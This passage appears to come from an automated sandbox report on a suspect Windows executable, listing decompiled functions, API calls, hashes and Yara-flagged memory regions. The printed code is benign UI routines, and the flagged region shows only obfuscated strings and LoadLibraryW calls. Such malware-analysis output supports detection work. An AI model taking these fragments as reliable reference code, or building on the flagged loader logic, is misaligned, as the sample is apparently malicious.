                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                  • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                  • API String ID: 3537336938-2299501126
                  • Opcode ID: bfbc1c96aaba27a77679c78974248008ba7ab69e62fdb767fd29b078a1314c47
                  • Instruction ID: 276f3bedf62ddd5b22347acf92b6dc6af1d8d2188565f558e9842f9ecaecafdf
                  • Opcode Fuzzy Hash: bfbc1c96aaba27a77679c78974248008ba7ab69e62fdb767fd29b078a1314c47
                  • Instruction Fuzzy Hash: B2515E70D002289BCB61DF65CC457EEBAB5AF99304F1041EBE949E3290D7789E81CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02318D0A, Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 436libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02319CDE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ro$!x,5$)Zk$,UiB$:@Q^$;.\$>7$@}$SL2X$]|F,$c$tW/$u-0V${!*2$YsV$^qr
                  • API String ID: 1029625771-3671267125
                  • Opcode ID: 4a45dd45196d96610dfd7f8a7a560177df2ffaaa5bbf151ccc9b661bb659292f
                  • Instruction ID: c373fe405948ae7ade5331c2273c369e40a6b9e4508a42acd49b66be704a3395
                  • Opcode Fuzzy Hash: 4a45dd45196d96610dfd7f8a7a560177df2ffaaa5bbf151ccc9b661bb659292f
                  • Instruction Fuzzy Hash: 7372B5F48167A98BDB65DF419E847CEBA34BB51305F5082C8C26C3A214CB750B86CF8A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040C354, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040C354() {
				void* __ebx;
				void* __esi;
				void* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				signed int _t16;
				signed int _t17;
				struct HINSTANCE__* _t19;
				void* _t21;
				void* _t24;
				void* _t25;

				_t17 = _t16 ^ _t16;
				_t24 =  *0x466334 - _t17; // 0x0
				if(_t24 == 0) {
					_push(_t21);
					 *0x466338 = E0040C2FA(_t17, _t21, __eflags);
					_t19 = GetModuleHandleA("USER32");
					__eflags = _t19 - _t17;
					if(_t19 == _t17) {
						L12:
						 *0x466318 = _t17;
						 *0x46631c = _t17;
						 *0x466320 = _t17;
						 *0x466324 = _t17;
						 *0x466328 = _t17;
						 *0x46632c = _t17;
						 *0x466330 = _t17;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t19, "GetSystemMetrics");
						 *0x466318 = _t6;
						__eflags = _t6 - _t17;
						if(_t6 == _t17) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t19, "MonitorFromWindow");
							 *0x46631c = _t7;
							__eflags = _t7 - _t17;
							if(_t7 == _t17) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t19, "MonitorFromRect");
								 *0x466320 = _t8;
								__eflags = _t8 - _t17;
								if(_t8 == _t17) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t19, "MonitorFromPoint");
									 *0x466324 = _t9;
									__eflags = _t9 - _t17;
									if(_t9 == _t17) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t19, "EnumDisplayMonitors");
										 *0x46632c = _t10;
										__eflags = _t10 - _t17;
										if(_t10 == _t17) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t19, "GetMonitorInfoA");
											 *0x466328 = _t11;
											__eflags = _t11 - _t17;
											if(_t11 == _t17) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t19, "EnumDisplayDevicesA");
												 *0x466330 = _t12;
												__eflags = _t12 - _t17;
												if(_t12 == _t17) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x466334 = 1;
					return _t5;
				} else {
					_t25 =  *0x466328 - _t17; // 0x0
					return 0 | _t25 != 0x00000000;
				}
			}



















                  0x0040c357
                  0x0040c359
                  0x0040c35f
                  0x0040c36e
                  0x0040c37a
                  0x0040c385
                  0x0040c387
                  0x0040c389
                  0x0040c41d
                  0x0040c41d
                  0x0040c423
                  0x0040c429
                  0x0040c42f
                  0x0040c435
                  0x0040c43b
                  0x0040c441
                  0x0040c447
                  0x0040c38f
                  0x0040c39b
                  0x0040c39d
                  0x0040c3a2
                  0x0040c3a4
                  0x00000000
                  0x0040c3a6
                  0x0040c3ac
                  0x0040c3ae
                  0x0040c3b3
                  0x0040c3b5
                  0x00000000
                  0x0040c3b7
                  0x0040c3bd
                  0x0040c3bf
                  0x0040c3c4
                  0x0040c3c6
                  0x00000000
                  0x0040c3c8
                  0x0040c3ce
                  0x0040c3d0
                  0x0040c3d5
                  0x0040c3d7
                  0x00000000
                  0x0040c3d9
                  0x0040c3df
                  0x0040c3e1
                  0x0040c3e6
                  0x0040c3e8
                  0x00000000
                  0x0040c3ea
                  0x0040c3f0
                  0x0040c3f2
                  0x0040c3f7
                  0x0040c3f9
                  0x00000000
                  0x0040c3fb
                  0x0040c401
                  0x0040c403
                  0x0040c408
                  0x0040c40a
                  0x00000000
                  0x0040c40c
                  0x0040c40e
                  0x0040c40e
                  0x0040c40e
                  0x0040c40a
                  0x0040c3f9
                  0x0040c3e8
                  0x0040c3d7
                  0x0040c3c6
                  0x0040c3b5
                  0x0040c3a4
                  0x0040c411
                  0x0040c41c
                  0x0040c361
                  0x0040c363
                  0x0040c36d
                  0x0040c36d

                  APIs
                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,0040C4A9,?,?,?,?,?,?,?,0040E929,00000000,00000002,00000028), ref: 0040C37F
                  • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040C39B
                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040C3AC
                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040C3BD
                  • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040C3CE
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040C3DF
                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040C3F0
                  • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040C401
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                  • API String ID: 667068680-68207542
                  • Opcode ID: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction ID: 97ffdccdbcf6cb09da46b2faea870da2eca337babe3f4635d63e23a0ead0a9a5
                  • Opcode Fuzzy Hash: 3e63bc07579a273cf3458e94ca2d048ab89fd83f7511a7af2d42a1a611f821d8
                  • Instruction Fuzzy Hash: 792150B1E10260ABC3115FB5ACC482A7EE8B28CB05362453FEC01E3352E3B850C99E5E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B10C, Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 394stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0040B10C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t148;
				void* _t157;
				int _t191;
				int _t223;
				int _t225;
				int _t227;
				int _t230;
				intOrPtr* _t240;
				intOrPtr* _t241;
				intOrPtr* _t249;
				intOrPtr* _t250;
				signed int* _t252;
				int _t259;
				int _t261;
				void* _t264;
				int _t314;
				int _t339;
				int _t340;
				int _t346;
				struct HWND__** _t347;
				int _t348;
				int _t349;
				struct tagMENUITEMINFOA _t350;
				int _t351;
				void* _t353;
				void* _t356;

				_t356 = __eflags;
				_t335 = __edx;
				_push(0x174);
				E00431A9B(E0044AF14, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t353 - 0x18)) = __ecx;
				E004014C0(_t353 - 0x10, __edx);
				_t337 = lstrlenA;
				 *(_t353 - 4) =  *(_t353 - 4) & 0x00000000;
				_t346 = lstrlenA("ReBarWindow32") + 1;
				_t148 = E004014F0(_t353 - 0x10, _t346);
				_t347 =  *(_t353 + 0xc);
				GetClassNameA( *_t347, _t148, _t346);
				E0040A356(_t353 - 0x10, 0xffffffff);
				 *(_t353 - 0x14) = E0040EE68(_t353 - 0x10, lstrlenA, _t347, _t356,  *_t347);
				if(E00409F00(_t353 - 0x10, _t335, "ReBarWindow32") != 0) {
					L37:
					_t348 = 0;
					L6:
					E004010B0( *((intOrPtr*)(_t353 - 0x10)) + 0xfffffff0, _t335);
					return E00431B73(_t348);
				}
				_t259 =  *(_t353 - 0x14);
				if(_t259 == 0 || E0041E99D(_t259, "@;E") == 0) {
					goto L37;
				} else {
					_t157 = E0040F898(_t259);
					if(_t157 == 0) {
						L7:
						E0041F754(_t259, _t353 - 0x78, _t337, _t347, __eflags);
						E004014C0(_t353 + 8, _t335);
						E004014C0(_t353 + 0xc, _t335);
						 *(_t353 - 4) = 3;
						E00422859(_t353 - 0x4c);
						_push( *((intOrPtr*)(_t353 - 0x18)));
						 *(_t353 - 4) = 4;
						E00422E1F(_t259, _t353 - 0xac, _t337, _t347, __eflags);
						 *((intOrPtr*)(_t353 - 0x180)) =  *((intOrPtr*)(_t259 + 0x98));
						 *(_t353 - 4) = 5;
						 *((intOrPtr*)(_t353 - 0x17c)) = 0x10;
						E004087FA(_t259, _t347[3], _t353 - 0x180);
						E00408830(_t259, _t347[3], _t353 - 0x88);
						_t260 = "ToolbarWindow32";
						_t339 = lstrlenA("ToolbarWindow32") + 1;
						GetClassNameA( *(_t353 - 0x160), E004014F0(_t353 - 0x10, _t339), _t339);
						E0040A356(_t353 - 0x10, 0xffffffff);
						_t340 = E0040EE68(_t353 - 0x10, _t339, _t347, __eflags,  *(_t353 - 0x160));
						 *(_t353 - 0x58) = _t340;
						__eflags = E00409F00(_t353 - 0x10, _t335, "ToolbarWindow32");
						if(__eflags != 0) {
							L36:
							 *(_t353 - 4) = 4;
							E00422E73(_t260, _t353 - 0xac, _t340, _t347, __eflags);
							 *(_t353 - 4) = 3;
							E00422E06(_t353 - 0x4c);
							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
							__eflags =  *((intOrPtr*)(_t353 + 8)) + 0xfffffff0;
							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
							 *(_t353 - 4) = 0;
							E0040AED0(_t260, _t353 - 0x78, _t340, _t347, __eflags);
							goto L37;
						}
						__eflags = _t340;
						if(__eflags == 0) {
							goto L36;
						}
						__eflags = E0041E99D(_t340, 0x44fc0c);
						if(__eflags == 0) {
							goto L36;
						}
						_t349 =  &(_t347[6]);
						__eflags = _t349;
						 *((intOrPtr*)(_t353 - 0x80)) =  *_t349;
						 *(_t353 - 0x54) = _t349;
						E00422C3C( *(_t353 - 0x14), _t353 - 0x88);
						E00422BFB(_t340, _t353 - 0x88);
						_t261 = E00406ACA(_t340);
						 *(_t353 - 0x14) = _t261;
						while(1) {
							_t261 = _t261 - 1;
							 *(_t353 - 0x24) = _t261;
							E004087FA(_t340, _t261, _t353 - 0xec);
							_t191 = IntersectRect(_t353 - 0xfc, _t353 - 0x88, _t353 - 0xec);
							__eflags = _t191;
							if(_t191 != 0) {
								break;
							}
							__eflags = _t261;
							if(_t261 > 0) {
								continue;
							}
							break;
						}
						_t350 = 0x30;
						E00431160(_t340, _t353 - 0xdc, 0, _t350);
						 *(_t353 - 0xdc) = _t350;
						 *(_t353 - 0x28) = E00408817(_t340);
						E00423999(_t353 - 0x3c);
						 *((intOrPtr*)(_t353 - 0x3c)) = 0x44fff0;
						 *(_t353 - 4) = 6;
						E00425F9A(_t353 - 0x3c,  *(_t353 - 0x14) - _t261, 0xffffffff);
						E0041F51D(_t261, _t353 - 0x78, _t340, CreatePopupMenu());
						E0040876B(_t353 - 0x4c, _t353 - 0xac);
						_t351 = 0;
						while(1) {
							__eflags = _t261 -  *(_t353 - 0x14);
							if(__eflags >= 0) {
								break;
							}
							E00406956(_t340, _t335, __eflags, _t261, _t353 - 0x20, _t353 - 0x50, _t353 - 0x1c);
							__eflags =  *(_t353 - 0x50) & 0x00000001;
							if(( *(_t353 - 0x50) & 0x00000001) != 0) {
								__eflags = _t351;
								if(_t351 == 0) {
									L29:
									_t261 = _t261 + 1;
									__eflags = _t261;
									 *(_t353 - 0x24) = _t261;
									continue;
								}
								 *((intOrPtr*)(_t353 - 0xd8)) = 0x100;
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x800;
								L28:
								InsertMenuItemA( *(_t353 - 0x74), _t261, 1, _t353 - 0xdc);
								goto L29;
							}
							 *((intOrPtr*)(_t353 - 0xd8)) = 0x162;
							_t223 = E00402720(_t353 + 8,  *((intOrPtr*)(_t353 - 0x20)));
							__eflags = _t223;
							if(_t223 == 0) {
								E00401E30(_t353 + 0xc);
							} else {
								E0041B29E(_t353 + 0xc,  *((intOrPtr*)(_t353 + 8)), 1, 0xa);
							}
							_t225 = E00404461(__eflags, 8);
							__eflags = _t225;
							if(_t225 == 0) {
								_t225 = 0;
								__eflags = 0;
							} else {
								 *(_t225 + 4) =  *(_t225 + 4) & 0x00000000;
								 *_t225 = 0x4502c8;
							}
							E004260C0(_t261, _t353 - 0x3c, _t351, _t225);
							_t227 =  *(_t353 - 0x28);
							__eflags = _t227;
							if(_t227 == 0) {
								L24:
								_t102 = _t353 - 0xbc;
								 *_t102 =  *(_t353 - 0xbc) & 0x00000000;
								__eflags =  *_t102;
								goto L25;
							} else {
								_t230 = E0040A2E6(_t353 - 0x11c,  *((intOrPtr*)(_t227 + 4)),  *((intOrPtr*)(_t353 - 0x1c)), _t353 - 0x11c);
								__eflags = _t230;
								if(_t230 == 0) {
									goto L24;
								}
								CopyRect(_t353 - 0x68, _t353 - 0x10c);
								OffsetRect(_t353 - 0x68,  ~( *(_t353 - 0x68)),  ~( *(_t353 - 0x64)));
								E00408744( *((intOrPtr*)(E0040B917(_t353 - 0x3c, _t351))), _t353 - 0xac,  *((intOrPtr*)(_t353 - 0x60)),  *((intOrPtr*)(_t353 - 0x5c)));
								_t240 = E0040B917(_t353 - 0x3c, _t351);
								_t241 = E0040B917(_t353 - 0x3c, _t351);
								 *_t241 = E00408791(_t353 - 0x4c,  *_t240);
								E00423E9D(_t353 - 0x4c, _t353 - 0x68, GetSysColor(4));
								E0040A307( *(_t353 - 0x28), _t353 - 0x4c,  *((intOrPtr*)(_t353 - 0x1c)), 0, 0, 1);
								_t249 = E0040B917(_t353 - 0x3c, _t351);
								_t250 = E0040B917(_t353 - 0x3c, _t351);
								 *_t250 = E00408791(_t353 - 0x4c,  *_t249);
								_t252 = E0040B917(_t353 - 0x3c, _t351);
								_t340 =  *(_t353 - 0x58);
								_t261 =  *(_t353 - 0x24);
								 *(_t353 - 0xbc) =  *_t252;
								L25:
								 *(_t353 - 0xb8) =  *(_t353 + 0xc);
								 *((intOrPtr*)(_t353 - 0xcc)) =  *((intOrPtr*)(_t353 - 0x20));
								 *((intOrPtr*)(_t353 - 0xd4)) = 0x100;
								_t351 = _t351 + 1;
								goto L28;
							}
						}
						E00413342(_t353 - 0x98,  *(_t353 - 0x54));
						E00422C3C( *((intOrPtr*)(_t353 - 0x18)), _t353 - 0x98);
						E0040D8F0(_t353 - 0x78, __eflags, 0,  *((intOrPtr*)(_t353 - 0x98)),  *((intOrPtr*)(_t353 - 0x8c)),  *((intOrPtr*)(_t353 - 0x18)), 0);
						_t264 = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t353 + 0x10)))) = 0;
						__eflags = _t351;
						if(__eflags <= 0) {
							L35:
							 *(_t353 - 4) = 5;
							E004239B0(_t353 - 0x3c);
							 *(_t353 - 4) = 4;
							E00422E73(_t264, _t353 - 0xac, 0, _t351, __eflags);
							 *(_t353 - 4) = 3;
							E00422E06(_t353 - 0x4c);
							E004010B0( &(( *(_t353 + 0xc))[0xfffffffffffffffc]), _t335);
							E004010B0( *((intOrPtr*)(_t353 + 8)) + 0xfffffff0, _t335);
							 *(_t353 - 4) = 0;
							E0040AED0(_t264, _t353 - 0x78, 0, _t351, __eflags);
							_t348 = 1;
							goto L6;
						} else {
							goto L32;
						}
						do {
							L32:
							_t314 =  *(E0040B917(_t353 - 0x3c, _t264));
							__eflags = _t314;
							if(_t314 != 0) {
								 *((intOrPtr*)( *_t314 + 4))(1);
							}
							_t264 = _t264 + 1;
							__eflags = _t264 - _t351;
						} while (__eflags < 0);
						goto L35;
					}
					_t361 =  *((intOrPtr*)(_t353 - 0x18)) - _t157;
					if( *((intOrPtr*)(_t353 - 0x18)) == _t157) {
						goto L7;
					}
					_t348 = E0040B10C(_t259, _t157, _t335, lstrlenA, _t347, _t361,  *((intOrPtr*)(_t353 + 8)), _t347,  *((intOrPtr*)(_t353 + 0x10)));
					goto L6;
				}
			}





























                  0x0040b10c
                  0x0040b10c
                  0x0040b10c
                  0x0040b116
                  0x0040b11b
                  0x0040b121
                  0x0040b126
                  0x0040b12c
                  0x0040b13a
                  0x0040b13f
                  0x0040b145
                  0x0040b14b
                  0x0040b156
                  0x0040b166
                  0x0040b170
                  0x0040b62b
                  0x0040b62b
                  0x0040b1b5
                  0x0040b1bb
                  0x0040b1c7
                  0x0040b1c7
                  0x0040b176
                  0x0040b17b
                  0x00000000
                  0x0040b195
                  0x0040b197
                  0x0040b19e
                  0x0040b1ca
                  0x0040b1cd
                  0x0040b1d5
                  0x0040b1dd
                  0x0040b1e5
                  0x0040b1e9
                  0x0040b1ee
                  0x0040b1f7
                  0x0040b1fb
                  0x0040b206
                  0x0040b218
                  0x0040b21c
                  0x0040b226
                  0x0040b237
                  0x0040b23c
                  0x0040b246
                  0x0040b258
                  0x0040b263
                  0x0040b273
                  0x0040b279
                  0x0040b281
                  0x0040b283
                  0x0040b5ee
                  0x0040b5f4
                  0x0040b5f8
                  0x0040b600
                  0x0040b604
                  0x0040b60f
                  0x0040b617
                  0x0040b61a
                  0x0040b622
                  0x0040b626
                  0x00000000
                  0x0040b626
                  0x0040b289
                  0x0040b28b
                  0x00000000
                  0x00000000
                  0x0040b29d
                  0x0040b29f
                  0x00000000
                  0x00000000
                  0x0040b2a8
                  0x0040b2a8
                  0x0040b2ad
                  0x0040b2b7
                  0x0040b2ba
                  0x0040b2c8
                  0x0040b2d4
                  0x0040b2d6
                  0x0040b2d9
                  0x0040b2df
                  0x0040b2e4
                  0x0040b2e7
                  0x0040b301
                  0x0040b307
                  0x0040b309
                  0x00000000
                  0x00000000
                  0x0040b30b
                  0x0040b30d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040b30d
                  0x0040b311
                  0x0040b31c
                  0x0040b326
                  0x0040b334
                  0x0040b337
                  0x0040b33c
                  0x0040b34e
                  0x0040b352
                  0x0040b361
                  0x0040b370
                  0x0040b375
                  0x0040b536
                  0x0040b536
                  0x0040b539
                  0x00000000
                  0x00000000
                  0x0040b38b
                  0x0040b390
                  0x0040b394
                  0x0040b507
                  0x0040b509
                  0x0040b532
                  0x0040b532
                  0x0040b532
                  0x0040b533
                  0x00000000
                  0x0040b533
                  0x0040b50b
                  0x0040b515
                  0x0040b51f
                  0x0040b52c
                  0x00000000
                  0x0040b52c
                  0x0040b3a0
                  0x0040b3aa
                  0x0040b3af
                  0x0040b3b1
                  0x0040b3c8
                  0x0040b3b3
                  0x0040b3be
                  0x0040b3be
                  0x0040b3cf
                  0x0040b3d5
                  0x0040b3d7
                  0x0040b3e5
                  0x0040b3e5
                  0x0040b3d9
                  0x0040b3d9
                  0x0040b3dd
                  0x0040b3dd
                  0x0040b3ec
                  0x0040b3f1
                  0x0040b3f4
                  0x0040b3f6
                  0x0040b4e1
                  0x0040b4e1
                  0x0040b4e1
                  0x0040b4e1
                  0x00000000
                  0x0040b3fc
                  0x0040b409
                  0x0040b40e
                  0x0040b410
                  0x00000000
                  0x00000000
                  0x0040b421
                  0x0040b437
                  0x0040b455
                  0x0040b45e
                  0x0040b469
                  0x0040b47c
                  0x0040b48c
                  0x0040b4a1
                  0x0040b4aa
                  0x0040b4b5
                  0x0040b4ca
                  0x0040b4cc
                  0x0040b4d3
                  0x0040b4d6
                  0x0040b4d9
                  0x0040b4e8
                  0x0040b4eb
                  0x0040b4f4
                  0x0040b4fa
                  0x0040b504
                  0x00000000
                  0x0040b504
                  0x0040b3f6
                  0x0040b548
                  0x0040b557
                  0x0040b572
                  0x0040b57a
                  0x0040b57c
                  0x0040b57e
                  0x0040b580
                  0x0040b59d
                  0x0040b5a0
                  0x0040b5a4
                  0x0040b5af
                  0x0040b5b3
                  0x0040b5bb
                  0x0040b5bf
                  0x0040b5ca
                  0x0040b5d5
                  0x0040b5dd
                  0x0040b5e1
                  0x0040b5e8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040b582
                  0x0040b582
                  0x0040b58b
                  0x0040b58d
                  0x0040b58f
                  0x0040b595
                  0x0040b595
                  0x0040b598
                  0x0040b599
                  0x0040b599
                  0x00000000
                  0x0040b582
                  0x0040b1a0
                  0x0040b1a3
                  0x00000000
                  0x00000000
                  0x0040b1b3
                  0x00000000
                  0x0040b1b3

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040B116
                  • lstrlenA.KERNEL32(ReBarWindow32,00000174), ref: 0040B136
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B14B
                  • lstrlenA.KERNEL32(ToolbarWindow32), ref: 0040B242
                  • GetClassNameA.USER32(?,00000000,00000001), ref: 0040B258
                  • IntersectRect.USER32 ref: 0040B301
                  • _memset.LIBCMT ref: 0040B31C
                  • CreatePopupMenu.USER32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?,@;E), ref: 0040B357
                  • CopyRect.USER32 ref: 0040B421
                  • OffsetRect.USER32(?,?,?), ref: 0040B437
                  • GetSysColor.USER32(00000004), ref: 0040B47E
                  • InsertMenuItemA.USER32(?,?,00000001,?), ref: 0040B52C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$ClassMenuNamelstrlen$ColorCopyCreateH_prolog3InsertIntersectItemOffsetPopup_memset
                  • String ID: @;E$ReBarWindow32$ToolbarWindow32
                  • API String ID: 3448309770-254675463
                  • Opcode ID: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction ID: cf85aa8ededd028deaa69243dfe9d59f927a8dbf855ff73a4b859d4dc9167fbb
                  • Opcode Fuzzy Hash: debc111b5dd1307f9d66f393594e2bf0b962d8dc5b9a3f3562b75b86374ad59f
                  • Instruction Fuzzy Hash: CFE17C71900219ABDF15EBA1CC91EEEB778EF04308F10416EF916B72D2DB385A44CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0231632A, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 323libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02316E94
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ''X$:1F$CP^-$VIQZ$V`.$[s4+$`4TI$f$s9NQ$u,y$x5\$)n/$Hq$SUP
                  • API String ID: 1029625771-1276608707
                  • Opcode ID: 8e9fb712d350e78819365e234c02ee184ffd8b81666fe236b2271e37ea13c3bd
                  • Instruction ID: 2e520913ce5c4e90c0d6e98d415737df709cc30cca05f59721159df75282cbdb
                  • Opcode Fuzzy Hash: 8e9fb712d350e78819365e234c02ee184ffd8b81666fe236b2271e37ea13c3bd
                  • Instruction Fuzzy Hash: 5C42A5F08063698BDB659F429A897CDBB74BB11704F6096C8D25D3B224CB750BC6CF89
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040E839, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0040E839(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E00412B38(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E0040C509(_t121, E0040C49C(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E00403AA0();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E0040C509(_t121, E0040C49C(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t123 + _t116 > _v28.right) {
					_t116 = _t108 - _v60.right + _v28.right;
				}
				if(_t116 < _v28.left) {
					_t116 = _v28.left;
				}
				if(_a4 + _t129 > _v28.bottom) {
					_t129 = _v60.top - _v60.bottom + _v28.bottom;
				}
				if(_t129 < _v28.top) {
					_t129 = _v28.top;
				}
				return E00412D05(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

























                  0x0040e839
                  0x0040e839
                  0x0040e842
                  0x0040e845
                  0x0040e84d
                  0x0040e850
                  0x0040e855
                  0x0040e863
                  0x0040e875
                  0x0040e865
                  0x0040e868
                  0x0040e868
                  0x0040e87b
                  0x0040e87f
                  0x0040e88b
                  0x0040e893
                  0x0040e895
                  0x0040e895
                  0x0040e893
                  0x0040e857
                  0x0040e857
                  0x0040e857
                  0x0040e857
                  0x0040e897
                  0x0040e8a5
                  0x0040e8ae
